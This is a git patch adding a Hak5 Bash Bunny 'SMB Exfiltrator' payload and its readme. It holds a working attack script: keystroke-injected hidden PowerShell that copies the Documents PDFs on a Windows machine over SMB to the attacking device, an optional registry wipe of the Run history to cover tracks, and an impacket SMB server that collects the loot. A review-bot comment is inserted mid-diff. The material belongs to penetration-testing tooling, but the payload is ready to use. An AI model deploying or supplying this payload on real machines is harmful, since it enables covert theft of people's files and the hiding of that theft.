From 42819e4e6b519e53247cae1c33f05acaf8006560 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Tue, 21 Mar 2017 14:12:41 +0700
Subject: [PATCH] Add SMB Exfiltrator Payload

This is an awesome payload check out Hak5 episode 2202
---
 payloads/library/smb_exfiltrator/payload.txt | 115 +++++++++++++++++++
 payloads/library/smb_exfiltrator/readme.md | 28 +++++
 2 files changed, 143 insertions(+)
 create mode 100644 payloads/library/smb_exfiltrator/payload.txt
 create mode 100644 payloads/library/smb_exfiltrator/readme.md
diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
new file mode 100644
index 00000000..06310fa0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -0,0 +1,115 @@
+#!/bin/bash
+#
+# Title: SMB Exfiltrator
+# Author: Hak5Darren
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows XP SP3+ (Powershell)
+# Attackmodes: HID, Ethernet
+#
+#
+# Red Blink Fast.......Impacket not found
+# Red Blink Slow.......Target did not acquire IP address
+# Amber Blink Fast.....Initialization
+# Amber................HID Stage
+# Purple Blink Fast....Ethernet Stage
+# Blue Interstitial....Receiving Files
+# White................Moving loot to mass storage
+# Green................Finished
+#
+# OPTIONS
+LOOTDIR=/root/udisk/loot/smb_exfiltrator
+EXFILTRATE_FILES="*.pdf"
+CLEARTRACKS="yes" # yes or no
+
+# Initialization
+LED R G 100
+
+
+# Check for impacket. If not found, blink fast red.
+if [ ! -d /pentest/impacket/ ]; then
+ LED R 100
+ exit 1
+fi
+
+
+# HID STAGE
+# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
+# Once found, initiates file copy and exits
+LED R G
+ATTACKMODE HID
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK ENTER
+
+# Clear tracks?
+if [ $CLEARTRACKS == "yes" ]; then
+ QUACK DELAY 500
+ QUACK GUI r
+ QUACK DELAY 500
+ QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+ QUACK ENTER
+fi
+
+
+# ETHERNET STAGE
+LED R B 100
+ATTACKMODE RNDIS_ETHERNET
+
+
+# Setup SMB server to receive loot in staging area
+mkdir -p /root/loot/smb_exfiltrator/temp/
+# house cleaning
+rm -rf /root/loot/smb_exfiltrator/temp/*
+# Fire up SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
+
+
+# Source bunny_helpers.sh to get environment variables
+source bunny_helpers.sh
+
+
+# Give target a chance to start exfiltration
+sleep 2
+
+
+# Make loot directory based on hostname (increment for multiple uses)
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+
+# Check target IP address. If unset, blink slow red.
+if [ -z "${TARGET_IP}" ]; then
+ LED R 1000
+ exit 1
+fi
+
+
+# Wait until exfiltration is complete
+last=0
+current=1
+while [ "$last" != "$current" ]; do
+ last=$current
+ current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
+ LED B
+ sleep 1
+ LED R B 100
+ sleep 9
+ # Files are still being copied. Loop.
+ # (Issue may exist if file takes longer than 10s to copy)
+done
+
+
+# Move files from staging area to loot directory
+LED R G B
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+sync; sleep 1; sync
+
+# Trap is clean
+LED G
diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md
new file mode 100644
index 00000000..dc0fbbb0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/readme.md
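Review bot: `HOST=${TARGET_HOSTNAME}` is presumably a string obtained from the target (it arrives via `source bunny_helpers.sh`), yet it is expanded unquoted into a glob and into paths in `COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)`, `mkdir -p $LOOTDIR/$HOST-$COUNT` and the later `mv` line, so a hostname containing whitespace or glob characters breaks the loot directory naming; quote those expansions, e.g. `mkdir -p -- "$LOOTDIR/$HOST-$COUNT"` and `mv -- /root/loot/smb_exfiltrator/temp/* "$LOOTDIR/$HOST-$COUNT"`. The count also parses `ls` output (ShellCheck SC2012) and only yields 1 on a first run because `ls` fails and prints an error to stderr when nothing matches, which is worth a comment at minimum. `if [ $CLEARTRACKS == "yes" ]` is unquoted and uses the bash-only `==` inside `[`, which errors out if the option is set to an empty string; `if [[ "$CLEARTRACKS" == "yes" ]]; then` matches the `[[ -z "$HOST" ]]` form used further down. The LED legend in the header (`# Purple Blink Fast....Ethernet Stage`) disagrees with readme.md in this same commit, which lists purple as "Switching to Mass Storage (optional)"; one of the two should be corrected so the status table is trustworthy.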
@@ -0,0 +1,28 @@
+# SMB Exfiltrator
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+
+## Configuration
+
+Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired.
+
+## STATUS
+
+| LED | Status |
+| ------------------- | -------------------------------------- |
+| Red (fast blink) | Impacket not found in /pentest |
+| Red (slow blink) | Setup Failed. Target didn't obtain IP |
+| Amber | Initialization |
+| Purple (fast blink) | Switching to Mass Storage (optional) |
+| Blue (interupt) | Receiving files |
+| White | Files received, moving to mass storage |
+| Green | Finished |